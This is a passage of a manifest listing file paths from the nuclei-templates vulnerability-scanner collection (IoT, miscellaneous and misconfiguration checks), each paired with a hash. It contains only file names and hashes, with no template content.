+nuclei-templates/iot/nuuno-network-login.yaml:8a98b8f8536bfb1c565f3eaecee678e0a4f884ee +nuclei-templates/iot/octoprint-3dprinter-detect.yaml:a737e82e41e110e7edd924a8c7c639b7bb9d5222 +nuclei-templates/iot/open-mjpg-streamer.yaml:b0577145d623d719bf5118f95b2f419c84fd1b33 +nuclei-templates/iot/panasonic-network-management.yaml:ccc0093fb3670652200a39765522e0d7ab374bf6 +nuclei-templates/iot/pqube-power-analyzers.yaml:4f5ace653dadb80230621678b47865bf9a0b0bbf +nuclei-templates/iot/qvisdvr-deserialization-rce.yaml:e87311b6bd332c71503e8df193dbcf17a96d17b6 +nuclei-templates/iot/routeros-login.yaml:5dc4481b7bc7fbd5b8fc7b309d657bc40b1ac3d3 +nuclei-templates/iot/selea-ip-camera.yaml:6dcefcfc280a5a2a44fba832187efc49a6cbe90f +nuclei-templates/iot/stem-audio-table-private-keys.yaml:ac96786a1eb01ad20e59877744d3703cdef73a17 +nuclei-templates/iot/targa-camera-lfi.yaml:6edf9ff5e666bc1fe9937de188fa3ff20fcced74 +nuclei-templates/iot/targa-camera-ssrf.yaml:339b2cf3bdc5f0e07556f5083a17fe93db1fdff2 +nuclei-templates/iot/upnp-device.yaml:a08302ec91960abf17385785ab2441e2e1d3f45a +nuclei-templates/iot/webcamxp-5.yaml:1c35a3121ec30f51d9b8a8eeeb27d9587b7c6813 +nuclei-templates/iot/webtools-home.yaml:0f69e27a4f89ca8ee53ee3e962480819c5ff6412 +nuclei-templates/iot/xp-webcam.yaml:712b96cdd7c1ab49f90f414cccc16a94e44a4180 +nuclei-templates/iot/zebra-printer-detect.yaml:58d84201064651d72580ee393cc468a6cd96eb1d +nuclei-templates/miscellaneous/addeventlistener-detect.yaml:78fdaf81776684390c6584578f9a8db726f33d7c +nuclei-templates/miscellaneous/apple-app-site-association.yaml:efeac90734f25b74c641f40e2806ddab5faf5395 +nuclei-templates/miscellaneous/aws-ecs-container-agent-tasks.yaml:84c94b59439119e9df81d4eb13ac0db1abe51b56 +nuclei-templates/miscellaneous/clientaccesspolicy.yaml:a27c7e727ee05426bd34771710b52c04b1dfae3b +nuclei-templates/miscellaneous/detect-dns-over-https.yaml:7b4a4441bf40b7bfa42ceb6e7ca9dac663497214 +nuclei-templates/miscellaneous/dir-listing.yaml:b79058b148228805fdb00a65f54fa44d5e0c0285 +nuclei-templates/miscellaneous/email-extractor.yaml:3de521eb65d1c2db3c4e5a5929dd0979f85abbb7 +nuclei-templates/miscellaneous/firebase-database-extractor.yaml:64a0576d33a080208e302fbcf181e568d1f11e7c +nuclei-templates/miscellaneous/google-floc-disabled.yaml:39f866697f7ea632cf88aa9dd4b3e360c8cf1703 +nuclei-templates/miscellaneous/htaccess-config.yaml:f4c329e0cd4800497883557780644f53814bd4df +nuclei-templates/miscellaneous/joomla-htaccess.yaml:0a02d0066cdc22293ef973789f68a40f43a6e187 +nuclei-templates/miscellaneous/joomla-manifest-file.yaml:57713b8a7b29c2f071eb9651f706c8ad2d915145 +nuclei-templates/miscellaneous/microsoft-azure-error.yaml:64900420aa55d47addb4892a73ca5303ff7a0860 +nuclei-templates/miscellaneous/moodle-changelog.yaml:4850c5d8f5d5f0bc507d513c7ff9e4a1d76d0467 +nuclei-templates/miscellaneous/netflix-conductor-version.yaml:41d000cb6546bdea79a5eaccea5793659a98f4f9 +nuclei-templates/miscellaneous/ntlm-directories.yaml:a87dbe24d90ef337d0728ffebaf094b4f99afe4e +nuclei-templates/miscellaneous/old-copyright.yaml:9f019a0db8df86e0c5ecec1a25bf3d2aaa50ba49 +nuclei-templates/miscellaneous/options-method.yaml:fbfc3f08b2f0ceb46a5c548cf6e23337b8d802a6 +nuclei-templates/miscellaneous/robots-txt-endpoint.yaml:9de6438d611d81eb71f25a2934aaa5bebd63ac1e +nuclei-templates/miscellaneous/robots-txt.yaml:58fd612a9d92d8b9285c0acd3b8d1aabc8cdca40 +nuclei-templates/miscellaneous/security-txt.yaml:f10b993ec2bd8d718e4fa26ccb3793756ccdec4f +nuclei-templates/miscellaneous/trace-method.yaml:fe9bae3302b4a10de8d699279fe78d4b468ba2be +nuclei-templates/miscellaneous/unpatched-coldfusion.yaml:54ad0ca51bfffa58b55ca8528cab3620be3fceee +nuclei-templates/miscellaneous/x-recruiting-header.yaml:3f8cf3804eee55dc8cf8cb32027b3e1516d2fb14 +nuclei-templates/miscellaneous/xml-schema-detect.yaml:fd614aa4e60f1ee7f2358059f9f116623f85da12 +nuclei-templates/misconfiguration/ace-admin-dashboard.yaml:af41e47517e4dad6113c605dfdaea66f3636ac28 +nuclei-templates/misconfiguration/adobe/adobe-connect-username-exposure.yaml:7184c6d680c3243645afeb988f38a75ff66a6b64 +nuclei-templates/misconfiguration/adobe/adobe-connect-version.yaml:f66e5ab6d473f508d69c76854ad1f3a9d9ada8cd +nuclei-templates/misconfiguration/aem/aem-acs-common.yaml:e1e45cd02d2ba10ee0dcac69e10bf7f59a1d397d +nuclei-templates/misconfiguration/aem/aem-bg-servlet.yaml:0fddbf62b452f526e294c04c269a21b245465847 +nuclei-templates/misconfiguration/aem/aem-bulkeditor.yaml:6bdf7193d1a69df776d7bb17622b768bee230ebd +nuclei-templates/misconfiguration/aem/aem-cached-pages.yaml:954c34038533e1c42d5bd02753b6ffd8f52debdd +nuclei-templates/misconfiguration/aem/aem-crx-browser.yaml:da4fe0f0d046b8c4cec1e40ecdd5fcdf5074d393 +nuclei-templates/misconfiguration/aem/aem-crx-bypass.yaml:a2f819f65edf3147a6443b3e213a8343f7b82ac5 +nuclei-templates/misconfiguration/aem/aem-crx-namespace.yaml:8b45c8550531391d8bc807efd53d5ace71d15931 +nuclei-templates/misconfiguration/aem/aem-crx-search.yaml:e7fd153f04a3325db0e46643221f8617015a0148 +nuclei-templates/misconfiguration/aem/aem-custom-script.yaml:e6a97c9c3e98f2d52fc05c2c63619cb4027fc2cd +nuclei-templates/misconfiguration/aem/aem-debugging-libraries.yaml:e8e91a814cf95a1d073eba05927619dbdbcffdce +nuclei-templates/misconfiguration/aem/aem-default-get-servlet.yaml:d54de280fe821d7d68eb38d6ce676bbbc2abaed9 +nuclei-templates/misconfiguration/aem/aem-disk-usage.yaml:b9bf3b04138c91731a34426bfe80144b290cc6d0 +nuclei-templates/misconfiguration/aem/aem-dump-contentnode.yaml:ae21fcab3ee9617fff0e957167e2a4fe816c945d +nuclei-templates/misconfiguration/aem/aem-explorer-nodetypes.yaml:b4082a41f9cb1ca2df5fbc3f0c6ce818fd297c13 +nuclei-templates/misconfiguration/aem/aem-external-link-checker.yaml:a541802db1e886ca96d2145655d40b9f7b602e97 +nuclei-templates/misconfiguration/aem/aem-gql-servlet.yaml:760c9cc3afcee83277b9db14a64b323148170d58 +nuclei-templates/misconfiguration/aem/aem-groovyconsole.yaml:5a63343e3035495439ec69ef58779a92d1d3b8bf +nuclei-templates/misconfiguration/aem/aem-hash-querybuilder.yaml:4df469d4f94166cb0162c6465f307feaefc49140 +nuclei-templates/misconfiguration/aem/aem-jcr-querybuilder.yaml:c115914a6d089c504bb7d06015b6a193ce142786 +nuclei-templates/misconfiguration/aem/aem-login-status.yaml:231b5228f44b1cd1f3971257b5b17255281ba9a7 +nuclei-templates/misconfiguration/aem/aem-merge-metadata-servlet.yaml:cae45f1dfd5db82311eed4a8b46eca6c121ee274 +nuclei-templates/misconfiguration/aem/aem-misc-admin.yaml:914ce83f210f689ef5efead347b370c2ed69970b +nuclei-templates/misconfiguration/aem/aem-offloading-browser.yaml:da23f23134b2d447755d3ecafe88b958c8527e06 +nuclei-templates/misconfiguration/aem/aem-osgi-bundles.yaml:d5ab4c8fba25b91d70a72e82744491e103f77c4e +nuclei-templates/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml:05e1fc02475049cdc721928f5cdba333d2c109d4 +nuclei-templates/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml:d42f96d634030d5a3910c644c7f1738a9a6a5a5f +nuclei-templates/misconfiguration/aem/aem-querybuilder-json-servlet.yaml:791e4c9c57999f01aa4d8758c3614875fba5e754 +nuclei-templates/misconfiguration/aem/aem-security-users.yaml:e6d53207c55f3531e11fce90c7db420bda94f023 +nuclei-templates/misconfiguration/aem/aem-setpreferences-xss.yaml:247e7be621fa5950f8017fc9376ca05c1110af4f +nuclei-templates/misconfiguration/aem/aem-sling-userinfo.yaml:9627c75ae153f49f5e7a08d99f92dbaa88e6965e +nuclei-templates/misconfiguration/aem/aem-userinfo-servlet.yaml:d7dba9deaf4dcfc15d7c8341717acff759db49fb +nuclei-templates/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml:78dae07fe55b62bc1352a0665e0ee6ff2ef4dbeb +nuclei-templates/misconfiguration/aem/aem-xss-childlist-selector.yaml:2286142949431c9cda2a18754a58a482dd970351 +nuclei-templates/misconfiguration/airflow/airflow-debug.yaml:a52e47293a571b3b7da2e05346e94ecbc5f4e014 +nuclei-templates/misconfiguration/airflow/unauthenticated-airflow.yaml:4656e41cd02a2dc0b3967d82609f65bfe2dedd74 +nuclei-templates/misconfiguration/akamai-arl-xss.yaml:db2d9e853ece20da4dad915bc06f80db8369f034 +nuclei-templates/misconfiguration/alibaba-mongoshake-unauth.yaml:752c987d58889078b08b3fc067d9816eaf0792d8 +nuclei-templates/misconfiguration/ampache-update-exposure.yaml:12de4cc1fbe95df99ea82a3bbdbab1096fdd62b1 +nuclei-templates/misconfiguration/ampps-dirlisting.yaml:e0d7542cf8314171fdc1b361c977215d7a8bb1b3 +nuclei-templates/misconfiguration/android-debug-database-exposed.yaml:e86dd1b6462aa24e2f33ed08bb6f420c818842a1 +nuclei-templates/misconfiguration/apache/apache-filename-enum.yaml:37f91a178a87a83517cb933ee2daa539a8e85253 +nuclei-templates/misconfiguration/apache/apache-hbase-unauth.yaml:0dbb8ba4c8392db6b4b58da6de97ae2b0e30112c +nuclei-templates/misconfiguration/apache/apache-storm-unauth.yaml:ef8a6015d6beeada055d81ce7d974ffc806ce96f +nuclei-templates/misconfiguration/apache/tomcat-pathnormalization.yaml:18f88e5932018f3e46268c3373823e48f6373327 +nuclei-templates/misconfiguration/apache-drill-exposure.yaml:0027240750b516907b433a271dd4a2001bf43ddf +nuclei-templates/misconfiguration/apache-druid-unauth.yaml:e81e6e413515687a2fcdd48deab9f037d44da890 +nuclei-templates/misconfiguration/apc-info.yaml:6a8b19adac71973b6adb6be84b55dfb77f902ef7 +nuclei-templates/misconfiguration/application-yaml.yaml:cb57a3023ac893378813e1b8e07bc3695d7e9c20 +nuclei-templates/misconfiguration/artifactory-anonymous-deploy.yaml:2044d6cb821dff9a1623cbe9fdef8cc188f9e156 +nuclei-templates/misconfiguration/aspx-debug-mode.yaml:fcb07141c210b46b376cebf92fa92eb7bddc730f +nuclei-templates/misconfiguration/atlassian-bamboo-build.yaml:3ddd0baa4816a8befd3d80907793143ebac1e957 +nuclei-templates/misconfiguration/aws-object-listing.yaml:2743c60082f9d4e47b126df0dc04b92979dc7c71 +nuclei-templates/misconfiguration/aws-redirect.yaml:09f725fd45bb1a7aac17ba00659cae83daa825e0 +nuclei-templates/misconfiguration/aws-s3-explorer.yaml:8fd3d861b36f05cc8dd827e5f42338a13f2dfc4e +nuclei-templates/misconfiguration/aws-xray-application.yaml:326adeee15d4ffc6d28ff97d6dc61fceca1d3bf4 +nuclei-templates/misconfiguration/awstats-listing.yaml:7eeac9032ed757a44e3e3d1e16671ea7553e923f +nuclei-templates/misconfiguration/bitbucket-public-repository.yaml:93b5979eb01e04e72c7985194df9df93045c25be +nuclei-templates/misconfiguration/blackbox-exporter-metrics.yaml:8350116c820f7009fd73a74b76c25d08d4f33eee +nuclei-templates/misconfiguration/bootstrap-admin-panel-template.yaml:f0949f623aea172730b7ac2378ad3f230650834d +nuclei-templates/misconfiguration/browserless-debugger.yaml:73a7cc41ff1ed17caaca6530d43ce15ebd421897 +nuclei-templates/misconfiguration/caddy-open-redirect.yaml:2c155fafee96cfddefd8b93b28ab609e3a01ffc7 +nuclei-templates/misconfiguration/cadvisor-exposure.yaml:4278c879c553f01cb465cae64bc9e94ff1f6ddfb +nuclei-templates/misconfiguration/cgi-test-page.yaml:12d3d3d2643d7c78a908afab84e4fe36a50a1f91 +nuclei-templates/misconfiguration/clockwork-dashboard-exposure.yaml:9f069eb98e8edfa5afcd89c44efcf6cedada7661 +nuclei-templates/misconfiguration/cloud-metadata.yaml:8b638d6cf6e0197687f5ce7a8eba7060d9c9e5c7 +nuclei-templates/misconfiguration/cloudflare-image-ssrf.yaml:69e086dd4a4a1736686e3d822980bfbc505ec8ba +nuclei-templates/misconfiguration/cobbler-exposed-directory.yaml:fbdb895ce7caf9b54eebbaf113c546260b79dc32 +nuclei-templates/misconfiguration/codemeter-webadmin.yaml:1ead4ca4980684a7fd999b28b234305ef9577929 +nuclei-templates/misconfiguration/codis-dashboard.yaml:c652864687b7236615c0d5f9f661cdcf98d49c83 +nuclei-templates/misconfiguration/collectd-exporter-metrics.yaml:40d15e9e91e29bca21c6a3ddb7d37d95661384e6 +nuclei-templates/misconfiguration/command-api-explorer.yaml:f784eafe5eb49975606a664835065bc0ac009a11 +nuclei-templates/misconfiguration/confluence/confluence-oauth-admin.yaml:84a2fc0144aea89f813c30eec8617ace1a1afc9c +nuclei-templates/misconfiguration/confluence-dashboard.yaml:6d915d81fda9c54177717b837d8f639abbff8101 +nuclei-templates/misconfiguration/corebos-htaccess.yaml:b018016410cbd86734b5efb4623bc755f0c9dacb +nuclei-templates/misconfiguration/cx-cloud-upload-detect.yaml:9894283cab54961ba96a153be6aa07c95d196b64 +nuclei-templates/misconfiguration/d-link-arbitary-fileread.yaml:4e6b553752978c0a59347797efd35637984c4122 +nuclei-templates/misconfiguration/database-error.yaml:ceb203b73f0eff0306a16f407ef1f67575edd5c2 +nuclei-templates/misconfiguration/debug/ampache-debug.yaml:b1d6b9ef8a88dfa0f51a37120b06959226379467 +nuclei-templates/misconfiguration/debug/bottle-debug.yaml:c776fd480a90eebb9463f876da9e1c4fdce9ce81 +nuclei-templates/misconfiguration/debug/flask-werkzeug-debug.yaml:2535f771f54941ff6d86d860e3904b436eeddf09 +nuclei-templates/misconfiguration/debug/github-debug.yaml:5a6e83aecd66b2ab5aa05bbf5dda7d975bb29519 +nuclei-templates/misconfiguration/dgraph-dashboard-exposure.yaml:6e0b3f1883a38eac8dbbb9b27a92da12cf9d6ce0 +nuclei-templates/misconfiguration/django-debug-detect.yaml:bfce44ee058bf5d0b5471c01008615c0f2abfce7 +nuclei-templates/misconfiguration/docker-registry.yaml:9dc2c12ebf53e1674aa524e21fbf12c9710b4965 +nuclei-templates/misconfiguration/docmosis-tornado-server.yaml:089263ddc578b99f6106d8e79f7c77a9496d7362 +nuclei-templates/misconfiguration/druid-monitor.yaml:3236da24049f1f7bf123258b7d25a134e1908236 +nuclei-templates/misconfiguration/drupal/drupal-user-enum-ajax.yaml:0577c69f26201ecf45f46a66717d64bd0458f721 +nuclei-templates/misconfiguration/drupal/drupal-user-enum-redirect.yaml:d00ffbf48e1b5cd154f738a486f77365132c6f1f +nuclei-templates/misconfiguration/ec2-instance-information.yaml:43b7a45b97cbca3a9a5ed7977902746e614e66bb +nuclei-templates/misconfiguration/elastic-hd-dashboard.yaml:4ba992b74b9891c902599359501e429821316de1 +nuclei-templates/misconfiguration/elasticsearch.yaml:558f0647f9d332581388314921496cd4216d5574 +nuclei-templates/misconfiguration/encompass-cm1-homepage.yaml:a6fda68bac411337dc7fd7d7f906e20d02de31eb +nuclei-templates/misconfiguration/envoy-admin-exposure.yaml:230139f3a19d42d450d8f2c48bc0c7d99c248f7b +nuclei-templates/misconfiguration/espeasy-mega-exposure.yaml:853f83ad03b32d46f11bbf5be0f9651d4d9d9c16 +nuclei-templates/misconfiguration/etcd-unauthenticated-api.yaml:086742fe08e7b61c8680aeb3db85f1ab88c218d1 +nuclei-templates/misconfiguration/exposed-docker-api.yaml:ddcb0d22ec3f0fd777bab559ae4934a297d7e0cb +nuclei-templates/misconfiguration/exposed-jquery-file-upload.yaml:325f880b7da5949f01dd5db1ed5773a182493346 +nuclei-templates/misconfiguration/exposed-kafdrop.yaml:85e110d313b5de3510c3324e66542637d4dba854 +nuclei-templates/misconfiguration/exposed-kibana.yaml:43d5387f950f01e865b2a1acf89829ad16a2e121 +nuclei-templates/misconfiguration/exposed-service-now.yaml:b90085c3ee90c4a267d33a0e41f6b4cdbb0e425c +nuclei-templates/misconfiguration/exposed-sqlite-manager.yaml:685f02edfd0f9b48365bc62cb4a868474eadff57 +nuclei-templates/misconfiguration/express-stack-trace.yaml:818e81478f5e5f788fcbf01757bcd6ed4274ff40 +nuclei-templates/misconfiguration/formalms-install.yaml:b1af0f15c0e7b51fc3ecbee3a964d64a1987818b +nuclei-templates/misconfiguration/front-page-misconfig.yaml:ec7b8fdf2a89bc8085b0a906609ebe9cb70e4083 +nuclei-templates/misconfiguration/git-web-interface.yaml:036a790f4a30014fa575abfd5d3172ac2c855dc5 +nuclei-templates/misconfiguration/gitea-public-signup.yaml:50e51e1e56430f88ae859e3a89c8a17c692efd1e +nuclei-templates/misconfiguration/gitlab/gitlab-api-user-enum.yaml:708361855c9897df5722c7a5725c4600e2813fa0 +nuclei-templates/misconfiguration/gitlab/gitlab-public-repos.yaml:982b0cd45d665b77aa03871419e47530d20f5047 +nuclei-templates/misconfiguration/gitlab/gitlab-public-signup.yaml:8bfc385bccd643a904cd1cacdbf4341ceb918afc +nuclei-templates/misconfiguration/gitlab/gitlab-public-snippets.yaml:0cb2a925ecf9632d867675778a12914e38c57004 +nuclei-templates/misconfiguration/gitlab/gitlab-uninitialized-password.yaml:8949737b6bc386011f70cfe0b1fcd5556d3ffac7 +nuclei-templates/misconfiguration/gitlab/gitlab-user-enum.yaml:b40e951b9ab4032efda494588539b682b8c33f95 +nuclei-templates/misconfiguration/gitlist-disclosure.yaml:94abf8cb46336e268c26aa24af4b72050fd5fd5c +nuclei-templates/misconfiguration/global-traffic-statistics.yaml:943eed4b079beb6deff1bafcba25615a50e62d4b +nuclei-templates/misconfiguration/glpi-directory-listing.yaml:205c8815303ed94227985dd8462cc51e75899b4e +nuclei-templates/misconfiguration/gocd/gocd-cruise-configuration.yaml:89e28f4277293797788b055f81b4600051654df3 +nuclei-templates/misconfiguration/gocd/gocd-encryption-key.yaml:0c8b4dcce4a9d990c1d2f37dbac33e720d1efd72 +nuclei-templates/misconfiguration/gocd/gocd-unauth-dashboard.yaml:dbbf507d573e1b67c34798e5ff3ec7f23636aef3 +nuclei-templates/misconfiguration/google/insecure-firebase-database.yaml:4aaf772862b2f8bb2e7e04ce089181f01756b208 +nuclei-templates/misconfiguration/grafana-public-signup.yaml:31cc2cd8d5d51028a35fed727d4cf5ccfd31c40c +nuclei-templates/misconfiguration/graphql/graphql-alias-batching.yaml:1651ce592f86c8855745a3c3f247e464c7238996 +nuclei-templates/misconfiguration/graphql/graphql-array-batching.yaml:682e3dc4437d4b75cfa7a1853af65ae5da5ab9ac +nuclei-templates/misconfiguration/graphql/graphql-field-suggestion.yaml:c8e898ea1fe58b6662de3f76f3d13fadb6ae8308 +nuclei-templates/misconfiguration/graphql/graphql-get-method.yaml:36a06267a4cbd5f432d7ec888b21bde7da60145a +nuclei-templates/misconfiguration/graphql/graphql-playground.yaml:281de1494a04b4aa8282a10846d6d55e37dcbf4e +nuclei-templates/misconfiguration/hadoop-unauth-rce.yaml:9642fb02f97d147a76813d17067f767eda0d46cb +nuclei-templates/misconfiguration/haproxy-exporter-metrics.yaml:f3c0147a424ec8e49a45e36a3873059e6057a163 +nuclei-templates/misconfiguration/haproxy-status.yaml:fa1a1042cca268ac4dbbe14907d7a511a7c3f024 +nuclei-templates/misconfiguration/healthchecks-ui-exposure.yaml:4414684f5a65751905f1fc6082e0791e8977c12c +nuclei-templates/misconfiguration/hfs-exposure.yaml:74441a5bc9af2f5eedcfda17872d0a6af02477d3 +nuclei-templates/misconfiguration/hivequeue-agent.yaml:52cd8c28dd2e128f10a6d5392aa1cc1e63884fc2 +nuclei-templates/misconfiguration/hp/unauthorized-hp-printer.yaml:7e538ad83f0b679cb0c41ec0cdae450dd036b363 +nuclei-templates/misconfiguration/hp/unauthorized-printer-hp.yaml:6779524f1989883dc4ed341a71b0cb120e2e169e +nuclei-templates/misconfiguration/hpe-system-management-anonymous.yaml:57cbbc6f17de504b1472381f593c53ded438e85b +nuclei-templates/misconfiguration/http-missing-security-headers.yaml:fdebe9b775234c5116e2ed773fe6fba3d7c36025 +nuclei-templates/misconfiguration/ibm-friendly-path-exposure.yaml:934ebc22598345df8366bd35c1fb5421494a23f4 +nuclei-templates/misconfiguration/iis-internal-ip-disclosure.yaml:d43ae1b8822937a949cb8eff2750dd07608b2bb0 +nuclei-templates/misconfiguration/installer/ampache-music-installer.yaml:c1f207ad73415987f7fd2dc8b104122305eae6d7 +nuclei-templates/misconfiguration/installer/avideo-install.yaml:756156cbc1fec18818484accf7e369b8576d9229 +nuclei-templates/misconfiguration/installer/bagisto-installer.yaml:d7dce787d7ed0fda4a13814ea78576a824f2fa43 +nuclei-templates/misconfiguration/installer/binom-installer.yaml:31205d4db23e8873c0dac424dec54b41beb69370 +nuclei-templates/misconfiguration/installer/blesta-installer.yaml:a21e35ab20a818630b892b9ffc15f3de6755cf90 +nuclei-templates/misconfiguration/installer/cloudcenter-Installer.yaml:85ea31db956a49ac5db78157525284f074eee733 +nuclei-templates/misconfiguration/installer/codeigniter-installer.yaml:6f028b1285376447374c0815e7e3533127c89302 +nuclei-templates/misconfiguration/installer/contentify-installer.yaml:54e4ef9bd02bb08029814e21c4a626335e04e30e +nuclei-templates/misconfiguration/installer/discourse-installer.yaml:8aaef3654160e7e5fd4a2e72222c96702f9a0bf9 +nuclei-templates/misconfiguration/installer/dokuwiki-installer.yaml:65d77092abbea48639e2246b145415113c713d1e +nuclei-templates/misconfiguration/installer/eshop-installer.yaml:689e62d3ac8fedd7fe9d232b97a1c20fc23d876a +nuclei-templates/misconfiguration/installer/espeasy-installer.yaml:070e126579145fcb112b7186659ab4c7dbc8802a +nuclei-templates/misconfiguration/installer/facturascripts-installer.yaml:5220e29a47107bdbd4590953e279277aabdf606a +nuclei-templates/misconfiguration/installer/geniusocean-installer.yaml:090c8249a3e7111e4d849e8258609542cb2973c1 +nuclei-templates/misconfiguration/installer/gitea-installer.yaml:28a0e7e979ce396801a1c55b165bb11a24632009 +nuclei-templates/misconfiguration/installer/joomla-installer.yaml:db7de0d1c709eb74c6d8f9237afa11d96f435db0 +nuclei-templates/misconfiguration/installer/limesurvey-installer.yaml:b672db92515fa6e6111ad7164700ecd83ff6b4ba +nuclei-templates/misconfiguration/installer/lmszai-installer.yaml:a56e69cf06159698f9b790af1c1dd15f18d56971 +nuclei-templates/misconfiguration/installer/lychee-installer.yaml:1e2acbc8ccdc85a1be291a0bf0464eb61aad7019 +nuclei-templates/misconfiguration/installer/magento-installer.yaml:569a98e116572b2e111658564a71d9c3d91548fe +nuclei-templates/misconfiguration/installer/matomo-installer.yaml:78e3f71d1a54de0a7c937d89df60472643ad1d2a +nuclei-templates/misconfiguration/installer/mautic-installer.yaml:560bd0d6eee0858a67b337ed14775843d70acedb +nuclei-templates/misconfiguration/installer/moodle-installer.yaml:345ef26ac2dd97ea0822462cf74c27cbc8b33044 +nuclei-templates/misconfiguration/installer/nginx-auto-installer.yaml:8c6a99938c21d921a3129671f0023c73aee98b3f +nuclei-templates/misconfiguration/installer/nodebb-installer.yaml:55eb58cf77798b6d56fbbb00294660a8e4b022da +nuclei-templates/misconfiguration/installer/nopcommerce-installer.yaml:7206500647bfa39f13983730fba502630b071bc6 +nuclei-templates/misconfiguration/installer/openmage-install.yaml:e68d39f3f3a880666a28c4300c5b32189b45eff7 +nuclei-templates/misconfiguration/installer/opensis-installer.yaml:9b6d042c0b4e1d95be4196acef88e6b15f765df6 +nuclei-templates/misconfiguration/installer/owncloud-installer-exposure.yaml:1c535eadfb60b2ebedf34f14929ea9b3ab6e0de0 +nuclei-templates/misconfiguration/installer/oxid-eshop-installer.yaml:23f849a8942f349e4d38e3d14fa96b73546bcbe7 +nuclei-templates/misconfiguration/installer/pagekit-installer.yaml:bb5fda4b65e12967dc26e0267df56f62f82c548e +nuclei-templates/misconfiguration/installer/permissions-installer.yaml:0ef32b5300a93c0a08b45a2272b7ef3e0d5d9744 +nuclei-templates/misconfiguration/installer/phpbb-installer.yaml:d25dac76da1733f2c2def2bfe2334c0009ae426e +nuclei-templates/misconfiguration/installer/phpwind-installer.yaml:1d482416122692a41203ae529c570453ca0d624e +nuclei-templates/misconfiguration/installer/piwik-installer.yaml:bb9c125a7b51517a82a1f9a4bdadc0402c14df4c +nuclei-templates/misconfiguration/installer/prestashop-installer.yaml:bcb45a987e64bbf33443f4c086308aaf7e3e6673 +nuclei-templates/misconfiguration/installer/processwire-installer.yaml:93c7f0bc3288bf85e9d28a8b9000b8aef5e5f285 +nuclei-templates/misconfiguration/installer/redash-installer.yaml:5e25df0e4d1679985b81e833e6f2a9080f50a6d4 +nuclei-templates/misconfiguration/installer/server-monitor-installer.yaml:b0af5ccac214fae04f715e095bdfad71b184eeda +nuclei-templates/misconfiguration/installer/shopify-app-installer.yaml:95ed144f40098d4cfcbdad7f5dfdd600c9a18f7e +nuclei-templates/misconfiguration/installer/smf-installer.yaml:bf42b25e28dac937b6ae60596b589320b6fcb136 +nuclei-templates/misconfiguration/installer/sms-installer.yaml:b5695a615317105190e30c80581496ef4e377e14 +nuclei-templates/misconfiguration/installer/suitecrm-installer.yaml:133499012c170841cb74a645ffd27b4108fe13ae +nuclei-templates/misconfiguration/installer/sumowebtools-installer.yaml:7c0cea2157f5e8dcf2eb8c45d69f11fced63984e +nuclei-templates/misconfiguration/installer/tasmota-install.yaml:ed11a2c3cdcbe061d14d16666902ec1201d4349d +nuclei-templates/misconfiguration/installer/testrail-install.yaml:e69425bcbdb1e9202665637791cbca872a7549d2 +nuclei-templates/misconfiguration/installer/tiny-rss-installer.yaml:dc943c8e70450ef972ecd31a5ce4aef01c1b1844 +nuclei-templates/misconfiguration/installer/turbo-website-installer.yaml:ea3f9066685c9a501381c2e9cf4fe8407d24eb16 +nuclei-templates/misconfiguration/installer/typo3-installer.yaml:9b3f560ff16d075e605349065e8a2f34f2d11996 +nuclei-templates/misconfiguration/installer/umbraco-installer.yaml:5aa04ada070e8679558747be5a3fc2bb736e7951 +nuclei-templates/misconfiguration/installer/unifi-wizard-install.yaml:8d3d1ccc6f994747e14b383b6262de113b166448 +nuclei-templates/misconfiguration/installer/uvdesk-install.yaml:5e6629c2b6993f258ae0117143fe8db3f8c60d81 +nuclei-templates/misconfiguration/installer/vtiger-installer.yaml:2b4cd23b187884baecdd9272616667bc49e02d47 +nuclei-templates/misconfiguration/installer/webasyst-installer.yaml:c74bcd4e1982a3a6edd78b89314aa7cc428bf39b +nuclei-templates/misconfiguration/installer/webuzo-installer.yaml:b5a8ebaa5cd131662f0f7ad594080bd98c8b7c4f +nuclei-templates/misconfiguration/iot-vdme-simulator.yaml:58c05579549e47c6d30eda0926a00db11b72bada +nuclei-templates/misconfiguration/jaeger-ui-dashboard.yaml:b729cd97e62969019295969c3054b01a174d5e08 +nuclei-templates/misconfiguration/java-melody-exposed.yaml:184b34e9cd2669d919aa2ba1ae83ac256b737cf0 +nuclei-templates/misconfiguration/jboss-status.yaml:ee9875634d9151096e5b18caa2a7757c7c14dafb +nuclei-templates/misconfiguration/jenkins/jenkins-openuser-register.yaml:79a6ce0deec9d1c811f2373f394f4d7fa254149b +nuclei-templates/misconfiguration/jetty-showcontexts-enable.yaml:c266e93094f77edab6c7f442d0bf73aa65823bbf +nuclei-templates/misconfiguration/jkstatus-manager.yaml:cb9b56571046214e35484653867c0f8e9573e395 +nuclei-templates/misconfiguration/jolokia/jolokia-info-disclosure.yaml:8efa02b7d5eb1b1c0d2947b3c912694943359856 +nuclei-templates/misconfiguration/jolokia/jolokia-list.yaml:722f5c4211b9a9d44dff19c6634119ce3274f4fe +nuclei-templates/misconfiguration/jolokia/jolokia-mbean-search.yaml:461c305477e34bb147cc8d618b6924ef540fc125 +nuclei-templates/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml:989e149bf4b6dcdcd825c51d84b5fb12f7b5b28e +nuclei-templates/misconfiguration/jupyter-ipython-unauth.yaml:3ce6dc6468f727ac6b555d9d94ec489e328114e6 +nuclei-templates/misconfiguration/jupyter-notebooks-exposed.yaml:e9093bbee16a2bd81724d6cf9e260f6c16cb04e2 +nuclei-templates/misconfiguration/kafka-cruise-control.yaml:faab06b94e05d68218ddf4dbd1269e38c340e569 +nuclei-templates/misconfiguration/kubeflow-dashboard-unauth.yaml:69fcb5594a83f8e67882613d183a7bdfe94da908 +nuclei-templates/misconfiguration/kubernetes/kubernetes-metrics.yaml:8ffd4cc096cfa20bda990fef625860c66cade484 +nuclei-templates/misconfiguration/kubernetes/kubernetes-pods.yaml:17e09ed085c41ceaf01f00a05b186a7a56394273 +nuclei-templates/misconfiguration/kubernetes/kubernetes-resource-report.yaml:664c22a3ffa124711b6c95b44716e9fd5d097fa2 +nuclei-templates/misconfiguration/laravel-debug-enabled.yaml:533ccf4fd6ecc5a81cf7ab9d38c402eb39bb4132 +nuclei-templates/misconfiguration/laravel-debug-error.yaml:bf8dfe8d786609647ae8fcac73867c3373b5bda3 +nuclei-templates/misconfiguration/libvirt-exporter-metrics.yaml:3e460c6a77af357cf4033ba2bcfab0f5ec2326f6 +nuclei-templates/misconfiguration/liferay/liferay-api.yaml:eca300fba3cf255c4fbe2c26f408fb25ca490896 